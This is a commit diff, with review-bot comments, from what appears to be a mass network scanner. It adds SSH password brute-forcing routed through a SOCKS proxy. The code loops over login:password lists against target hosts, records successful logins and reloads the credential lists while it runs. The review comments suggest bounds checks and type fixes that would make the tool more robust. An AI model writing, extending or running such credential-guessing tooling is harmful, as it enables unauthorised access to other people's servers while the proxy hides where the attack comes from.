Partially implemented ssh over socks
parent
a17df57d90
commit
ff816f4645
@ -416,7 +416,6 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
|
||||
long sz = getFileSize(fileName);
|
||||
|
||||
if(sz != *szPtr) {
|
||||
|
||||
FileUpdater::lk = std::unique_lock<std::mutex> (FileUpdater::filesUpdatingMutex);
|
||||
*szPtr = sz;
|
||||
funcPtr();
|
||||
@ -428,13 +427,26 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
|
||||
|
||||
int FileUpdater::updateLists() {
|
||||
while(globalScanFlag) {
|
||||
updateList("negatives.txt", &oldNegLstSize, updateNegatives);
|
||||
updateList("login.txt", &oldLoginLstSize, updateLogin);
|
||||
updateList("pass.txt", &oldPassLstSize, updatePass);
|
||||
updateList("sshpass.txt", &oldSSHLstSize, updateSSH);
|
||||
updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin);
|
||||
updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass);
|
||||
|
||||
Sleep(60000);
|
||||
Sleep(60000);
|
||||
if(!globalScanFlag) break;
|
||||
loadOnce();
|
||||
}
|
||||
}
|
||||
|
||||
int FileUpdater::loadOnce() {
|
||||
updateList("negatives.txt", &oldNegLstSize, updateNegatives);
|
||||
updateList("login.txt", &oldLoginLstSize, updateLogin);
|
||||
updateList("pass.txt", &oldPassLstSize, updatePass);
|
||||
updateList("sshpass.txt", &oldSSHLstSize, updateSSH);
|
||||
updateList("wflogin.txt", &oldWFLoginLstSize, updateWFLogin);
|
||||
updateList("wfpass.txt", &oldWFPassLstSize, updateWFPass);
|
||||
}
|
||||
|
||||
void FileUpdater::FUClear() {
|
||||
oldNegLstSize = 0;
|
||||
oldLoginLstSize = 0;
|
||||
oldPassLstSize = 0;
|
||||
oldSSHLstSize = 0;
|
||||
oldWFLoginLstSize = 0;
|
||||
oldWFPassLstSize = 0;
|
||||
}
|
||||
|
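Review bot: `FileUpdater::loadOnce()` is declared `int` but its body ends after the last `updateList(...)` call with no `return`, and `FileUpdater::updateLists()` likewise leaves its `while(globalScanFlag)` loop and reaches the closing brace without returning a value. Flowing off the end of a non-void function is undefined behaviour in C++, and most compilers only warn about it. Add `return 0;` before the closing brace of both functions, or declare both `void` here and in FileUpdater.h, since the call inside `updateLists()` discards the result anyway.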
@ -26,8 +26,8 @@ public:
|
||||
|
||||
public:
|
||||
static int updateLists();
|
||||
static void passLoginLoader();
|
||||
static void negativeLoader();
|
||||
static int loadOnce();
|
||||
static void FUClear();
|
||||
};
|
||||
|
||||
#endif // FILEUPDATER_H
|
||||
|
146
SSHAuth.cpp
146
SSHAuth.cpp
@ -1,54 +1,97 @@
|
||||
#include "SSHAuth.h"
|
||||
#include "FileUpdater.h"
|
||||
|
||||
int _sshConnect(char *user, char *pass, const char *host, int port)
|
||||
{
|
||||
int _sshConnect(const char *user, const char *pass, const char *host, int port) {
|
||||
|
||||
CURL *curl = curl_easy_init();
|
||||
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
|
||||
char hostStr[128] = {0};
|
||||
ZeroMemory(hostStr, sizeof(hostStr));
|
||||
strcpy(hostStr, user);
|
||||
strcat(hostStr, "@");
|
||||
strcat(hostStr, host);
|
||||
int sshTimeout = gTimeOut + 1;
|
||||
|
||||
ssh_session my_ssh_session = ssh_new();
|
||||
if (my_ssh_session == NULL)
|
||||
if (curl)
|
||||
{
|
||||
ssh_free(my_ssh_session);
|
||||
return -1;
|
||||
};
|
||||
curl_easy_setopt(curl, CURLOPT_URL, host);
|
||||
curl_easy_setopt(curl, CURLOPT_PORT, port);
|
||||
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
|
||||
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
|
||||
int proxyPort = std::atoi(gProxyPort);
|
||||
if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
|
||||
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
|
||||
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
|
||||
} else {
|
||||
curl_easy_setopt(curl, CURLOPT_PROXY, "");
|
||||
}
|
||||
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
|
||||
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
|
||||
curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);
|
||||
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, hostStr);
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port);
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
|
||||
ssh_options_set(my_ssh_session, SSH_OPTIONS_TIMEOUT, &(gTimeOut + 1));
|
||||
int res = curl_easy_perform(curl);
|
||||
|
||||
int rc = ssh_connect(my_ssh_session);
|
||||
socket_t sock;
|
||||
curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
|
||||
|
||||
if (rc != SSH_OK)
|
||||
{
|
||||
ssh_disconnect(my_ssh_session);
|
||||
ssh_free(my_ssh_session);
|
||||
++offlines;
|
||||
return -2;
|
||||
if(res != CURLE_OK) {
|
||||
curl_easy_cleanup(curl);
|
||||
++ssh;
|
||||
stt->doEmitionRedFoundData("[SSH]Cannot connect to: " + QString(host) + ":" + QString::number(port));
|
||||
return 0;
|
||||
}
|
||||
|
||||
if(sock != -1) {
|
||||
ssh_session ssh_session = ssh_new();
|
||||
if (ssh_session == NULL)
|
||||
{
|
||||
ssh_free(ssh_session);
|
||||
curl_easy_cleanup(curl);
|
||||
return -1;
|
||||
};
|
||||
|
||||
ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
|
||||
ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
|
||||
ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
|
||||
|
||||
//Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
|
||||
res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);
|
||||
|
||||
res = ssh_connect(ssh_session);
|
||||
|
||||
if (res != SSH_OK) //Offline
|
||||
{
|
||||
ssh_disconnect(ssh_session);
|
||||
ssh_free(ssh_session);
|
||||
curl_easy_cleanup(curl);
|
||||
++offlines;
|
||||
return -2;
|
||||
}
|
||||
else
|
||||
{
|
||||
res = ssh_userauth_password(ssh_session, NULL, pass);
|
||||
if (res != SSH_AUTH_SUCCESS)
|
||||
{
|
||||
ssh_disconnect(ssh_session);
|
||||
ssh_free(ssh_session);
|
||||
curl_easy_cleanup(curl);
|
||||
return -1;
|
||||
};
|
||||
};
|
||||
|
||||
ssh_disconnect(ssh_session);
|
||||
ssh_free(ssh_session);
|
||||
} else {
|
||||
stt->doEmitionRedFoundData("[SSH]Socket = -1 " + QString(host) + ":" + QString::number(port));
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
rc = ssh_userauth_password(my_ssh_session, NULL, pass);
|
||||
if (rc != SSH_AUTH_SUCCESS)
|
||||
{
|
||||
ssh_disconnect(my_ssh_session);
|
||||
ssh_free(my_ssh_session);
|
||||
return -1;
|
||||
};
|
||||
};
|
||||
ssh_disconnect(my_ssh_session);
|
||||
ssh_free(my_ssh_session);
|
||||
|
||||
curl_easy_cleanup(curl);
|
||||
++ssh;
|
||||
return 0;
|
||||
}
|
||||
|
||||
char _get_ssh_banner(const char *ip, int port)
|
||||
{
|
||||
char _get_ssh_banner(const char *ip, int port) {
|
||||
char recvBuff[256] = {0};
|
||||
std::string buffer;
|
||||
Connector::nConnect(ip, port, &buffer);
|
||||
@ -63,14 +106,17 @@ char _get_ssh_banner(const char *ip, int port)
|
||||
return *recvBuff;
|
||||
}
|
||||
|
||||
int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int port, std::string *buffer, const char *banner)
|
||||
{
|
||||
int check_ssh_pass(const char *user, const char *pass,
|
||||
const char *userPass, const char *host, int port,
|
||||
std::string *buffer, const char *banner) {
|
||||
int res = -1;
|
||||
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host) + ":" + QString::number(port));
|
||||
if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(userPass) + "@" + QString(host) + ":" + QString::number(port));
|
||||
|
||||
res = _sshConnect(user, pass, host, port);
|
||||
|
||||
if(res == 0)
|
||||
{
|
||||
stt->doEmition_BAGreenData("[+] SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host));
|
||||
stt->doEmition_BAGreenData("[+] SSH: " + QString(userPass) + "@" + QString(host));
|
||||
buffer->append(userPass);
|
||||
buffer->append("@");
|
||||
buffer->append(host);
|
||||
@ -78,37 +124,31 @@ int check_ssh_pass(char *user, char *pass, char *userPass, const char *host, int
|
||||
buffer->append(banner);
|
||||
return 0;
|
||||
};
|
||||
|
||||
return res;
|
||||
}
|
||||
|
||||
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner)
|
||||
{
|
||||
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) {
|
||||
char login[32] = {0};
|
||||
char pass[32] = {0};
|
||||
char temp[64] = {0};
|
||||
BruteUtils::BConInc();
|
||||
int sz = 0;
|
||||
char *ptr1 = 0;
|
||||
int res = -1;
|
||||
|
||||
for(int i = 0; i < MaxSSHPass; ++i)
|
||||
{
|
||||
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
|
||||
if(!globalScanFlag) break;
|
||||
strcpy(temp, sshlpLst[i]);
|
||||
ptr1 = strstr(temp, ":");
|
||||
|
||||
if (ptr1 == NULL) {
|
||||
stt->doEmitionRedFoundData("[SSH]Wrong format: " + QString(temp));
|
||||
return -1;
|
||||
}
|
||||
stt->doEmitionRedFoundData("[SSH]Wrong format: " + QString(temp));
|
||||
return -1;
|
||||
}
|
||||
|
||||
sz = ptr1 - temp;
|
||||
strncpy(login, temp, sz);
|
||||
strncpy(login, temp, ptr1 - temp);
|
||||
strcpy(pass, ptr1 + 1);
|
||||
|
||||
res = check_ssh_pass(login, pass, temp, host, port, buffer, banner);
|
||||
|
||||
ZeroMemory(login, sizeof(login));
|
||||
ZeroMemory(pass, sizeof(pass));
|
||||
ZeroMemory(temp, sizeof(temp));
|
||||
@ -116,18 +156,15 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
|
||||
if(res == 0)
|
||||
{
|
||||
if(i == 0) return -2; //Failhit
|
||||
BruteUtils::BConDec();
|
||||
return 1;
|
||||
}
|
||||
else if(res == -2)
|
||||
{
|
||||
BruteUtils::BConDec();
|
||||
return -2;
|
||||
};
|
||||
|
||||
Sleep(500);
|
||||
};
|
||||
BruteUtils::BConDec();
|
||||
return -1;
|
||||
}
|
||||
|
||||
@ -138,7 +175,10 @@ int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
|
||||
const char &banner = _get_ssh_banner(ip, port);
|
||||
if(strlen(&banner) > 0)
|
||||
{
|
||||
return SSHBrute(ip, port, buffer, &banner);
|
||||
BruteUtils::BConInc();
|
||||
int res = SSHBrute(ip, port, buffer, &banner);
|
||||
BruteUtils::BConDec();
|
||||
return res;
|
||||
};
|
||||
return -1;
|
||||
}
|
||||
|
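Review bot: In `SSHBrute` the split of each `sshlpLst[i]` entry is still unbounded: `strcpy(temp, sshlpLst[i])` writes into `temp[64]`, `strncpy(login, temp, ptr1 - temp)` uses the offset of the `:` as its length instead of the size of `login[32]`, and `strcpy(pass, ptr1 + 1)` has no limit at all. Unless the list loader already caps entry length (not visible on this page), a long line in the list file overruns these stack buffers. Reject oversized entries before copying, e.g. `if (strlen(sshlpLst[i]) >= sizeof(temp)) continue;` and, once `ptr1` is known, `if ((size_t)(ptr1 - temp) >= sizeof(login) || strlen(ptr1 + 1) >= sizeof(pass)) continue;`. In `_sshConnect`, `socket_t sock` is tested by `if(sock != -1)` without being initialised and without checking the result of `curl_easy_getinfo`. libcurl documents `CURLINFO_LASTSOCKET` as writing a `long`, so the variable should be `long sock = -1;`, or use `CURLINFO_ACTIVESOCKET` with a `curl_socket_t`.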
@ -1825,7 +1825,7 @@ int startScan(char* args) {
|
||||
|
||||
stt->doEmitionIPRANGE(QString("--"));
|
||||
stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
|
||||
|
||||
FileUpdater::loadOnce();
|
||||
runAuxiliaryThreads();
|
||||
|
||||
if (gMode == 0)
|
||||
@ -2115,6 +2115,7 @@ int startScan(char* args) {
|
||||
}
|
||||
|
||||
void nCleanup(){
|
||||
FileUpdater::FUClear();
|
||||
Threader::cleanUp();
|
||||
curl_global_cleanup();
|
||||
|
||||
|